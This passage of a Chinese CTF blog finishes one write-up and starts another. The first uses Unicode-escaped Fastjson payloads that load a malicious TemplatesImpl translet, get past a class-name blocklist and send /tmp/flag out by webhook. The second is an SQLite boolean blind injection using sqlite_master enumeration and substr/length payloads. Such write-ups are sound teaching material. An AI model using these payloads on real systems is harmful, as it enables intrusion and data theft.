\"\\u0040type\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u006f\\u0072\\u0067\\u002e\\u0061\\u0070\\u0061\\u0063\\u0068\\u0065\\u002e\\u0078\\u0061\\u006c\\u0061\\u006e\\u002e\\u0069\\u006e\\u0074\\u0065\\u0072\\u006e\\u0061\\u006c\\u002e\\u0078\\u0073\\u006c\\u0074\\u0063\\u002e\\u0074\\u0072\\u0061\\u0078\\u002e\\u0054\\u0065\\u006d\\u0070\\u006c\\u0061\\u0074\\u0065\\u0073\\u0049\\u006d\\u0070\\u006c\",\n  \"_\\u0062\\u0079\\u0074\\u0065\\u0063\\u006f\\u0064\\u0065\\u0073\":&#91;\"&lt;base64 class bytes&gt;\"],\n  \"_\\u006e\\u0061\\u006d\\u0065\":\"p\"\n}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u91cd\u70b9\u4e0d\u662f\u90a3\u4e32\u5b57\u8282\u7801\u672c\u8eab\uff0c\u800c\u662f:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>@type<\/code> \u88ab Unicode \u5316<\/li>\n\n\n\n<li>\u5371\u9669\u7c7b\u540d\u88ab Unicode \u5316<\/li>\n\n\n\n<li>\u5173\u952e\u5b57\u6bb5\u540c\u6837\u505a\u4e86\u7ed5\u8fc7\u5904\u7406<\/li>\n<\/ul>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"2-java-8-\u517c\u5bb9\u7248\u89e6\u53d1\u7ed3\u6784\">2. Java 8 \u517c\u5bb9\u7248\u89e6\u53d1\u7ed3\u6784<\/h5>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>{\n  \"\\u0040type\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u006f\\u0072\\u0067\\u002e\\u0061\\u0070\\u0061\\u0063\\u0068\\u0065\\u002e\\u0078\\u0061\\u006c\\u0061\\u006e\\u002e\\u0069\\u006e\\u0074\\u0065\\u0072\\u006e\\u0061\\u006c\\u002e\\u0078\\u0073\\u006c\\u0074\\u0063\\u002e\\u0074\\u0072\\u0061\\u0078\\u002e\\u0054\\u0065\\u006d\\u0070\\u006c\\u0061\\u0074\\u0065\\u0073\\u0049\\u006d\\u0070\\u006c\",\n  \"_\\u0062\\u0079\\u0074\\u0065\\u0063\\u006f\\u0064\\u0065\\u0073\":&#91;\"&lt;java8 class bytes&gt;\"],\n  \"_\\u006e\\u0061\\u006d\\u0065\":\"p\",\n  \"_\\u0074\\u0066\\u0061\\u0063\\u0074\\u006f\\u0072\\u0079\":{\n    \"\\u0040type\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e\\u006f\\u0072\\u0067\\u002e\\u0061\\u0070\\u0061\\u0063\\u0068\\u0065\\u002e\\u0078\\u0061\\u006c\\u0061\\u006e\\u002e\\u0069\\u006e\\u0074\\u0065\\u0072\\u006e\\u0061\\u006c\\u002e\\u0078\\u0073\\u006c\\u0074\\u0063\\u002e\\u0074\\u0072\\u0061\\u0078\\u002e\\u0054\\u0072\\u0061\\u006e\\u0073\\u0066\\u006f\\u0072\\u006d\\u0065\\u0072\\u0046\\u0061\\u0063\\u0074\\u006f\\u0072\\u0079\\u0049\\u006d\\u0070\\u006c\"\n  },\n  \"_\\u006f\\u0075\\u0074\\u0070\\u0075\\u0074\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0069\\u0065\\u0073\":{\n    \"\\u0040type\":\"\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0069\\u0065\\u0073\"\n  }\n}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u6bb5\u771f\u6b63\u4f53\u73b0\u7684\u662f\u5b8c\u6574\u601d\u8def:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e0d\u662f\u53ea\u628a\u5371\u9669\u7c7b\u653e\u8fdb\u53bb\u5c31\u7ed3\u675f<\/li>\n\n\n\n<li>\u8fd8\u8981\u547d\u4e2d\u6b63\u786e\u7684\u89e6\u53d1\u8def\u5f84<\/li>\n\n\n\n<li>\u66f4\u8981\u4fdd\u8bc1 payload \u4e0e\u8fdc\u7aef JDK \u7248\u672c\u517c\u5bb9<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341-\u6700\u7ec8\u5229\u7528\u94fe\">\u5341\u3001\u6700\u7ec8\u5229\u7528\u94fe<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728\u5b57\u8282\u7801\u7248\u672c\u4fee\u6b63\u4e4b\u540e\uff0c\u539f\u672c\u90a3\u4e9b\u201c\u53ea\u662f\u62a5\u9519\u201d\u7684\u8bf7\u6c42\u7ec8\u4e8e\u53d8\u6210\u4e86\u771f\u5b9e\u6267\u884c\u3002\u867d\u7136\u63a5\u53e3\u8868\u9762\u4ecd\u53ef\u80fd\u8fd4\u56de\u5f02\u5e38\uff0c\u4f46\u8fdc\u7aef JVM \u5df2\u7ecf\u5b8c\u6210\u4e86:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7c7b\u52a0\u8f7d<\/li>\n\n\n\n<li>\u89e6\u53d1\u6267\u884c<\/li>\n\n\n\n<li>\u8bfb\u53d6\u76ee\u6807\u6587\u4ef6<\/li>\n\n\n\n<li>\u5916\u5e26\u56de\u4f20 <\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>flowchart LR <code>A&#91;\"\u767b\u5f55\u5f52\u6863\u4e2d\u5fc3\"] --&gt; B&#91;\"\u89c2\u5bdf rememberMe \u4e0e\u4f1a\u8bdd\u8bed\u4e49\"] B --&gt; C&#91;\"\u5b9a\u4f4d \/api\/integration\/preview\"] C --&gt; D&#91;\"\u8bc6\u522b fastjson-compat \u89e3\u6790\"] D --&gt; E&#91;\"Unicode \u7ed5\u8fc7\u5371\u9669\u7c7b\u540d\u62e6\u622a\"] E --&gt; F&#91;\"\u5b9e\u4f8b\u5316 TemplatesImpl\"] F --&gt; G&#91;\"\u547d\u4e2d\u6a21\u677f\u89e6\u53d1\u8def\u5f84\"] G --&gt; H&#91;\"\u66ff\u6362\u4e3a Java 8 \u517c\u5bb9\u6076\u610f translet\"] H --&gt; I&#91;\"\u8bfb\u53d6 \/tmp\/flag\"] I --&gt; J&#91;\"\u901a\u8fc7 webhook \u56de\u4f20\u7ed3\u679c\"]<\/code><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u771f\u6b63\u51b3\u5b9a\u6210\u8d25\u7684\uff0c\u4e0d\u662f\u67d0\u4e00\u4e2a\u5b64\u7acb\u6280\u5de7\uff0c\u800c\u662f\u4e09\u4ef6\u4e8b\u540c\u65f6\u6210\u7acb:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4f60\u770b\u61c2\u4e86\u9898\u9762\u7ed9\u51fa\u7684\u4e24\u6761\u7ebf\u7d22<\/li>\n\n\n\n<li>\u4f60\u627e\u5230\u4e86\u771f\u6b63\u7684\u517c\u5bb9\u89e3\u6790\u5165\u53e3<\/li>\n\n\n\n<li>\u4f60\u5c0a\u91cd\u4e86\u8fdc\u7aef\u8fd0\u884c\u65f6\u73af\u5883<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341\u4e00-\u7ed3\u679c\u786e\u8ba4\">\u5341\u4e00\u3001\u7ed3\u679c\u786e\u8ba4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Webhook \u6536\u5230\u7684\u6700\u7ec8\u56de\u4f20\u4e3a: \/tmp\/flag:FLAG{71b70868-77e0-4efa-ab98-b8f9133d53f5}<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u672c\u9898\u6700\u7ec8 flag \u662f: FLAG{71b70868-77e0-4efa-ab98-b8f9133d53f5}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341\u4e8c-\u8fd9\u9898\u5230\u5e95\u5728\u8003\u4ec0\u4e48\">\u5341\u4e8c\u3001\u8fd9\u9898\u5230\u5e95\u5728\u8003\u4ec0\u4e48<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u53ea\u628a\u8fd9\u9898\u603b\u7ed3\u6210\u201cFastjson \u53cd\u5e8f\u5217\u5316\u201d\uff0c\u5176\u5b9e\u662f\u4f4e\u4f30\u4e86\u5b83\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b83\u66f4\u50cf\u662f\u5728\u8003\u56db\u5c42\u80fd\u529b:<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-\u5bf9\u9898\u9762\u53d9\u4e8b\u7684\u5224\u65ad\u529b\">1. \u5bf9\u9898\u9762\u53d9\u4e8b\u7684\u5224\u65ad\u529b<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\"><code>rememberMe<\/code> \u4e0d\u662f\u65e0\u610f\u4e49\u88c5\u9970\uff0c<code>legacy parser<\/code> \u4e5f\u4e0d\u662f\u65e0\u610f\u4e49\u70b9\u7f00\u3002\u9898\u76ee\u628a\u4e24\u6761\u7ebf\u7d22\u90fd\u653e\u5230\u4e86\u660e\u9762\u4e0a\uff0c\u4f46\u771f\u6b63\u7684\u7a81\u7834\u5e76\u4e0d\u5728\u7b2c\u4e00\u773c\u6700\u5bb9\u6613\u4e0a\u5934\u7684\u5730\u65b9\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"2-\u5bf9-java-\u517c\u5bb9\u5c42\u98ce\u9669\u7684\u654f\u611f\">2. \u5bf9 Java \u517c\u5bb9\u5c42\u98ce\u9669\u7684\u654f\u611f<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u6240\u8c13\u201ccompat\u201d\uff0c\u5f88\u591a\u65f6\u5019\u5c31\u662f\u5386\u53f2\u503a\u6700\u6d53\u7684\u5730\u65b9\u3002\u4e00\u65e6\u8001\u89e3\u6790\u5668\u8fd8\u5728\u670d\u5f79\uff0c\u653b\u51fb\u9762\u5f80\u5f80\u4e0d\u662f\u7f29\u6c34\uff0c\u800c\u662f\u88ab\u6084\u6084\u4fdd\u7559\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"3-\u5bf9\u5229\u7528\u94fe\u72b6\u6001\u7684\u8fa8\u8bc6\u80fd\u529b\">3. \u5bf9\u5229\u7528\u94fe\u72b6\u6001\u7684\u8fa8\u8bc6\u80fd\u529b<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0d\u662f\u770b\u5230 <code>JSONException<\/code> \u5c31\u8bf4\u660e\u5931\u8d25\uff0c\u4e5f\u4e0d\u662f\u770b\u5230 <code>TemplatesImpl<\/code> \u5b9e\u4f8b\u5316\u5c31\u8bf4\u660e\u6210\u529f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f60\u5f97\u5206\u6e05:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u54ea\u4e00\u6b65\u53ea\u662f\u8fdb\u5165\u4e86\u89e3\u6790\u9636\u6bb5<\/li>\n\n\n\n<li>\u54ea\u4e00\u6b65\u771f\u7684\u5b8c\u6210\u4e86\u7c7b\u52a0\u8f7d<\/li>\n\n\n\n<li>\u54ea\u4e00\u6b65\u624d\u662f\u6700\u7ec8\u7684\u4ee3\u7801\u6267\u884c<\/li>\n<\/ul>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"4-\u5bf9\u8fd0\u884c\u73af\u5883\u7ec6\u8282\u7684\u656c\u754f\">4. \u5bf9\u8fd0\u884c\u73af\u5883\u7ec6\u8282\u7684\u656c\u754f<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6700\u6709\u5473\u9053\u7684\u4e00\u70b9\uff0c\u5c31\u662f\u8ba9\u4eba\u91cd\u65b0\u610f\u8bc6\u5230:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u6f0f\u6d1e\u5229\u7528\u4ece\u6765\u4e0d\u662f\u53ea\u548c\u8bed\u6cd5\u5bf9\u8bdd\uff0c\u5b83\u4e5f\u5728\u548c\u7248\u672c\u3001\u7c7b\u52a0\u8f7d\u5668\u3001\u8fd0\u884c\u65f6\u73b0\u5b9e\u5bf9\u8bdd\u3002<\/p>\n<\/blockquote>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341\u4e09-\u590d\u73b0\u6458\u8981\">\u5341\u4e09\u3001\u590d\u73b0\u6458\u8981<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u53ea\u4fdd\u7559\u6700\u6838\u5fc3\u7684\u590d\u73b0\u6b65\u9aa4\uff0c\u53ef\u4ee5\u538b\u7f29\u6210:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u4f7f\u7528 <code>guest \/ guest2026<\/code> \u767b\u5f55\u5f52\u6863\u4e2d\u5fc3<\/li>\n\n\n\n<li>\u89c2\u5bdf <code>rememberMe<\/code> \u4e0e <code>\/api\/session<\/code> \u7684 remembered \u8bed\u4e49<\/li>\n\n\n\n<li>\u4ece\u524d\u7aef JS \u5b9a\u4f4d\u5230 <code>\/api\/integration\/preview<\/code><\/li>\n\n\n\n<li>\u4ece\u54cd\u5e94\u4e2d\u7684 <code>fastjson-compat<\/code> \u786e\u8ba4\u517c\u5bb9\u89e3\u6790\u65b9\u5411<\/li>\n\n\n\n<li>\u7528 Unicode \u7ed5\u8fc7\u5371\u9669\u7c7b\u540d\u62e6\u622a<\/li>\n\n\n\n<li>\u6210\u529f\u5b9e\u4f8b\u5316 <code>TemplatesImpl<\/code><\/li>\n\n\n\n<li>\u53d1\u73b0\u8fdc\u7aef\u662f <code>Java\/1.8.0_482<\/code><\/li>\n\n\n\n<li>\u5c06\u6076\u610f translet \u91cd\u65b0\u7f16\u8bd1\u4e3a Java 8 \u5b57\u8282\u7801<\/li>\n\n\n\n<li>\u518d\u6b21\u89e6\u53d1\u6a21\u677f\u94fe<\/li>\n\n\n\n<li>\u4ece <code>\/tmp\/flag<\/code> \u8bfb\u53d6\u76ee\u6807\u5185\u5bb9\u5e76\u5916\u5e26\u56de\u4f20<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341\u56db-\u7ed3\u8bed\">\u5341\u56db\u3001\u7ed3\u8bed<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u9898\u540d\u53eb <strong>\u8bb0\u4f4f\u6211\uff0c\u4e5f\u8bb0\u4f4f\u5377\u5b97<\/strong>\uff0c\u5176\u5b9e\u53d6\u5f97\u5f88\u5999\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u201c\u8bb0\u4f4f\u6211\u201d\u662f\u8868\u5c42\u7ebf\u7d22\uff0c\u5b83\u628a\u4f60\u5f15\u5230\u8ba4\u8bc1\u3001\u4f1a\u8bdd\u3001\u957f\u671f\u72b6\u6001\uff1b\u201c\u8bb0\u4f4f\u5377\u5b97\u201d\u662f\u66f4\u6df1\u7684\u4e00\u5c42\uff0c\u5b83\u63d0\u9192\u4f60\u53bb\u770b\u90a3\u4e9b\u88ab\u7cfb\u7edf\u957f\u671f\u4fdd\u7559\u4e0b\u6765\u7684\u5f52\u6863\u903b\u8f91\u3001\u65e7\u6a21\u677f\u903b\u8f91\u3001\u517c\u5bb9\u89e3\u6790\u903b\u8f91\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u771f\u6b63\u5371\u9669\u7684\uff0c\u4ece\u6765\u4e0d\u53ea\u662f\u4e00\u4e2a\u767b\u5f55\u6846\u6216\u4e00\u4e2a Cookie\u3002\u771f\u6b63\u5371\u9669\u7684\uff0c\u662f\u4e00\u4e2a\u7cfb\u7edf\u5728\u957f\u671f\u6f14\u8fdb\u4e2d\u7559\u4e0b\u7684\u90a3\u4e9b\u201c\u5148\u522b\u5220\uff0c\u8fd8\u5f97\u517c\u5bb9\u201d\u7684\u89d2\u843d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u800c\u8fd9\u9053\u9898\u6700\u6f02\u4eae\u7684\u5730\u65b9\uff0c\u5c31\u5728\u4e8e\u5b83\u628a\u8fd9\u79cd\u5de5\u7a0b\u73b0\u5b9e\uff0c\u5b8c\u6574\u5730\u7ffb\u8bd1\u6210\u4e86\u4e00\u6761\u53ef\u4ee5\u771f\u6b63\u6253\u901a\u7684\u5229\u7528\u94fe\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"flag\">Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG{71b70868-77e0-4efa-ab98-b8f9133d53f5}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u9080\u8bf7\u7801\u8bf4\u5b83\u77e5\u9053\">\u9080\u8bf7\u7801\u8bf4\u5b83\u77e5\u9053<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u9080\u8bf7\u7801\u4e0d\u4f1a\u8bf4\u8bdd\uff0c\u4f46\u5b83\u4f1a\u70b9\u5934\u548c\u6447\u5934\u3002\u4f60\u95ee\u7684\u95ee\u9898\u591f\u5de7\uff0c\u5b83\u5c31\u4f1a\u6162\u6162\u628a\u79d8\u5bc6\u201c\u55ef\u55ef\u554a\u554a\u201d\u51fa\u6765\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u91cd\u70b9\u67e5\u770b\u524d\u7aef JS \u8c03\u7528\u7684 <code>\/api\/invite\/check?code=<\/code> \u63a5\u53e3\uff0c\u8fd9\u4e2a\u63a5\u53e3\u5b58\u5728 SQLite \u5e03\u5c14\u76f2\u6ce8\uff1b\u901a\u8fc7\u6784\u9020\u771f\u5047\u6761\u4ef6\u89c2\u5bdf <code>valid=true\/false<\/code> \u7684\u53d8\u5316\uff0c\u4ece <code>sqlite_master<\/code> \u679a\u4e3e\u8868\u7ed3\u6784\uff0c\u518d\u5229\u7528 <code>substr()<\/code>\u3001<code>length()<\/code> \u9010\u5b57\u7b26\u7206\u7834\u6570\u636e\u5e93\u4e2d\u7684 flag\u3002<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e00-\u9898\u76ee\u521d\u89c1\">\u4e00\u3001\u9898\u76ee\u521d\u89c1<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6253\u5f00\u9898\u76ee\u9996\u9875\uff0c\u9875\u9762\u672c\u8eab\u76f8\u5f53\u514b\u5236\uff0c\u529f\u80fd\u4e5f\u5f88\u5355\u4e00\uff1a\u8f93\u5165\u4e00\u4e2a\u9080\u8bf7\u7801\uff0c\u70b9\u51fb\u6821\u9a8c\uff0c\u524d\u7aef\u4f1a\u544a\u8bc9\u6211\u4eec\u9080\u8bf7\u7801\u662f\u5426\u6709\u6548\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u7c7b\u9875\u9762\u7684\u4ef7\u503c\u901a\u5e38\u4e0d\u5728 UI\uff0c\u800c\u5728\u5b83\u80cc\u540e\u7684\u63a5\u53e3\u8c03\u7528\u903b\u8f91\u3002\u56e0\u6b64\u7b2c\u4e00\u6b65\u4e0d\u662f\u76f2\u8bd5\u8f93\u5165\uff0c\u800c\u662f\u67e5\u770b\u524d\u7aef JavaScript\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u524d\u7aef\u6838\u5fc3\u903b\u8f91\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    form.addEventListener(\"submit\", async (event) =&gt; {\n      event.preventDefault();\n      result.textContent = \"Checking invite...\";\n      result.className = \"result\";\n\n      const params = new URLSearchParams({ code: code.value });\n      const response = await fetch(`\/api\/invite\/check?${params.toString()}`);\n      const data = await response.json();\n\n      result.textContent = data.message;\n      result.classList.add(data.valid ? \"ok\" : \"no\");\n    });<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u770b\u51fa\uff0c\u7528\u6237\u8f93\u5165\u6700\u7ec8\u4f1a\u8fdb\u5165\uff1a<code>\/api\/invite\/check?code=<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63a5\u53e3\u54cd\u5e94\u7c7b\u4f3c\uff1a<code>{\"message\":\"Invite code was not found.\",\"valid\":false}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc\u6700\u5173\u952e\u7684\u662f\uff1a<strong>\u8fd4\u56de\u503c\u91cc\u5b58\u5728\u53ef\u89c2\u6d4b\u7684\u5e03\u5c14\u91cf <code>valid<\/code><\/strong>\u3002\u8fd9\u610f\u5473\u7740\u5982\u679c\u53c2\u6570\u62fc\u63a5\u8fdb SQL \u8bed\u53e5\u4e2d\uff0c\u6211\u4eec\u5c31\u6709\u673a\u4f1a\u628a\u5b83\u53d8\u6210\u4e00\u4e2a\u201c\u771f\u5047\u5224\u65ad\u5668\u201d\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e8c-\u6f0f\u6d1e\u5b9a\u4f4d\">\u4e8c\u3001\u6f0f\u6d1e\u5b9a\u4f4d<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6839\u636e\u9898\u5e72\u63d0\u793a\uff0c\u672c\u9898\u5b58\u5728 <strong>SQLite \u5e03\u5c14\u76f2\u6ce8<\/strong>\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f\u8bf4\uff0c\u540e\u7aef\u5927\u6982\u7387\u5b58\u5728\u7c7b\u4f3c\u8fd9\u6837\u7684\u67e5\u8be2\u903b\u8f91\uff1a SELECT * FROM partner_invites WHERE code = &#8216;&lt;\u7528\u6237\u8f93\u5165&gt;&#8217;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u8f93\u5165\u672a\u7ecf\u5b89\u5168\u5904\u7406\uff0c\u90a3\u4e48\u6211\u4eec\u5c31\u80fd\u95ed\u5408\u539f\u6709\u5b57\u7b26\u4e32\uff0c\u5e76\u989d\u5916\u62fc\u63a5\u5e03\u5c14\u8868\u8fbe\u5f0f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u9a8c\u8bc1\u601d\u8def<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5206\u522b\u6784\u9020\u6052\u771f\u548c\u6052\u5047\u7684 payload\uff1a &#8216; OR 1=1&#8211; &#8216; OR 1=2&#8211;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6d4b\u8bd5\u7ed3\u679c\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>code=' OR 1=1--<\/code> \u65f6\uff0c\u63a5\u53e3\u8fd4\u56de <code>valid=true<\/code><\/li>\n\n\n\n<li><code>code=' OR 1=2--<\/code> \u65f6\uff0c\u63a5\u53e3\u8fd4\u56de <code>valid=false<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u5df2\u7ecf\u8db3\u591f\u786e\u8ba4\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u8f93\u5165\u88ab\u62fc\u63a5\u8fdb\u4e86 SQL<\/li>\n\n\n\n<li>\u6ce8\u91ca\u7b26 <code>--<\/code> \u751f\u6548<\/li>\n\n\n\n<li>\u6211\u4eec\u53ef\u4ee5\u7a33\u5b9a\u5229\u7528 <code>valid<\/code> \u7684\u771f\u5047\u56de\u663e\u505a\u5e03\u5c14\u76f2\u6ce8<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e09-\u4e3a\u4ec0\u4e48\u662f-sqlite\">\u4e09\u3001\u4e3a\u4ec0\u4e48\u662f SQLite<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u5e72\u5df2\u7ecf\u70b9\u660e\u662f SQLite\uff0c\u4f46\u4ece\u5229\u7528\u5c42\u9762\u770b\uff0cSQLite \u4e5f\u6709\u975e\u5e38\u9c9c\u660e\u7684\u7279\u5f81\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u53ef\u4ee5\u901a\u8fc7 <code>sqlite_master<\/code> \u679a\u4e3e\u8868\u7ed3\u6784<\/li>\n\n\n\n<li>\u652f\u6301 <code>length()<\/code>\u3001<code>substr()<\/code>\u3001<code>unicode()<\/code> \u7b49\u51fd\u6570<\/li>\n\n\n\n<li>\u53ef\u5229\u7528 <code>pragma_table_info('table_name')<\/code> \u67e5\u770b\u5217\u4fe1\u606f<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u6574\u9053\u9898\u7684\u8def\u7ebf\u975e\u5e38\u6e05\u6670\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u7528\u771f\u5047\u56de\u663e\u786e\u8ba4\u76f2\u6ce8\u6210\u7acb<\/li>\n\n\n\n<li>\u4ece <code>sqlite_master<\/code> \u679a\u4e3e\u8868\u540d<\/li>\n\n\n\n<li>\u5b9a\u4f4d\u53ef\u7591\u8868<\/li>\n\n\n\n<li>\u679a\u4e3e\u5b57\u6bb5<\/li>\n\n\n\n<li>\u7206\u51fa flag<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u56db-\u76f2\u6ce8\u5229\u7528\u94fe\">\u56db\u3001\u76f2\u6ce8\u5229\u7528\u94fe<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-\u679a\u4e3e\u8868\u6570\u91cf\">1. \u679a\u4e3e\u8868\u6570\u91cf<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u5e03\u5c14\u76f2\u6ce8\u7684\u57fa\u672c\u5f62\u5f0f\uff1a &#8216; OR ()&#8211;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5982\u5224\u65ad\u8868\u6570\u91cf\u662f\u5426\u5927\u4e8e\u67d0\u4e2a\u503c\uff1a &#8216; OR ((select count(*) from sqlite_master where type=&#8217;table&#8217;) &gt; 3)&#8211;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u914d\u5408\u4e8c\u5206\u6cd5\uff0c\u53ef\u4ee5\u5feb\u901f\u5f97\u5230\u6570\u636e\u5e93\u4e2d\u8868\u7684\u6570\u91cf\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u679a\u4e3e\u7ed3\u679c\u4e3a\uff1a 5<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"2-\u679a\u4e3e\u8868\u540d\">2. \u679a\u4e3e\u8868\u540d<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7 <code>limit 1 offset n<\/code> \u9010\u4e2a\u8bfb\u53d6\u8868\u540d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    select name\n    from sqlite_master\n    where type='table'\n    order by name\n    limit 1 offset 0<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u4f7f\u7528\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>length((...))<\/code> \u83b7\u53d6\u957f\u5ea6<\/li>\n\n\n\n<li><code>unicode(substr((...), i, 1))<\/code> \u83b7\u53d6\u7b2c <code>i<\/code> \u4e2a\u5b57\u7b26 ASCII\/Unicode \u503c<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\u8868\u540d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    organizations\n    partner_invites\n    sqlite_sequence\n    support_tickets\n    workspace_secret_notes<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u770b\u5230 <code>workspace_secret_notes<\/code> \u65f6\uff0c\u57fa\u672c\u5c31\u5df2\u7ecf\u6709\u5473\u9053\u4e86\u3002\u8fd9\u4e2a\u8868\u540d\u672c\u8eab\u5c31\u50cf\u662f\u5728\u8bf4\uff1a<strong>\u79d8\u5bc6\u5728\u8fd9\u91cc\u3002<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e94-\u5b57\u6bb5\u679a\u4e3e\">\u4e94\u3001\u5b57\u6bb5\u679a\u4e3e<\/h4>\n\n\n\n<p 